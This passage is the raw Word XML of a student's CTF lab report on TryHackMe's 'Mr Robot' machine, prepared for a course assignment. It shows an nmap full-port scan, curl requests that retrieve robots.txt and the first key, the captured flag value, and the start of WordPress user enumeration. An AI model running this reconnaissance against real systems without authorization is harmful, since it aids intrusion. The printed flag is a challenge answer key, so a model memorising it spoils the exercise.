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spacing w:before="800" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>PRACTICAL SECURITY ASSESSMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2E5C8A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-IN" w:bidi="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2E5C8A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Mr Robot | TryHackMe Lab Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2E5C8A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2E5C8A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-IN" w:bidi="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Difficulty: Medium</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="2E5C8A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Assessment Scope and Goals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P2"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>The goal of this exercise was to obtain at least three flags in the assigned CTF environment and record the approach, evidence, and results in line with the Bincom 6th Contact Session assignment.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="936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2800"/>
        <w:gridCol w:w="6560"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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143552"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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143552"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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EAF1F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Target name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Mr Robot CTF (TryHackMe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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EAF1F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Target IP (AttackBox)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>10.129.138.192</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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EAF1F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Target IP (Kali VPN session)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>10.130.138.103 / 10.130.128.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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EAF1F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Attacker platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>TryHackMe AttackBox (initial); Kali Linux VM via OpenVPN (main)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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EAF1F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Engagement type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Authorized lab CTF — credited to Leon Johnson, used with creator's permission</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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EAF1F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Flags required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3 minimum (3 captured)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore w:val="1"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Assessment Workflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P3"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Initial Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>The first step was a full TCP port scan with Nmap, including default scripts and service-version detection, to map the target's externally reachable services:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F1F4F7"/>
        <w:spacing w:before="60" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:ind w:left="173" w:right="115"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nmap -sC -sV -p- 10.129.138.192</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>The scan returned three accessible services:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="936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2800"/>
        <w:gridCol w:w="6560"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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143552"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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143552"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Service / Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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EAF1F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>22/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OpenSSH 8.2p1 Ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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EAF1F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>80/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Apache httpd (WordPress 4.3.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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EAF1F8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>443/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="65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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Apache httpd / SSL (self-signed cert, CN=www.example.com)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>The HTTP service presented a Mr Robot-themed WordPress website. Its reported version, WordPress 4.3.1, is obsolete and therefore became the main area for further investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="3571875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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3"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill dpi="0">
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="Relimage1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="5F6C78"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 2 — Nmap scan results showing ports 22 (SSH), 80 (HTTP/Apache), and 443 (HTTPS/Apache) open</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P3"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 Flag One — Information Exposed by robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>As part of routine web enumeration, the site's robots.txt file was inspected for paths and files that might reveal useful information:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F1F4F7"/>
        <w:spacing w:before="60" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:ind w:left="173" w:right="115"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>curl http://10.129.138.192/robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>The response listed two resources: fsocity.dic, a sizeable dictionary file, and key-1-of-3.txt, which could be requested directly to retrieve the first flag:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:fill="F1F4F7"/>
        <w:spacing w:before="60" w:after="100" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:ind w:left="173" w:right="115"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="20303E"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>curl http://10.129.138.192/key-1-of-3.txt</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="936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9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="93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143552"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Key 1 Captured: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Consolas" w:eastAsia="Consolas"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>073403c8a58a1f80d943455fb30724b9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="3571875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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5"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill dpi="0">
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="Relimage2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="3571875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="5F6C78"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 3 — robots.txt disclosing key-1-of-3.txt and fsocity.dic; Key 1 captured</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P3"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Identifying a Valid Username</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>Credential testing required a confirmed account name first. Three automated enumeration approaches were tried, but none identified a user:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="P9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:beforeAutospacing="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:t>WordPress REST API (?rest_route=/wp/v2/users) — endpoint not enabled on this WordPress 4.3.1 instance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
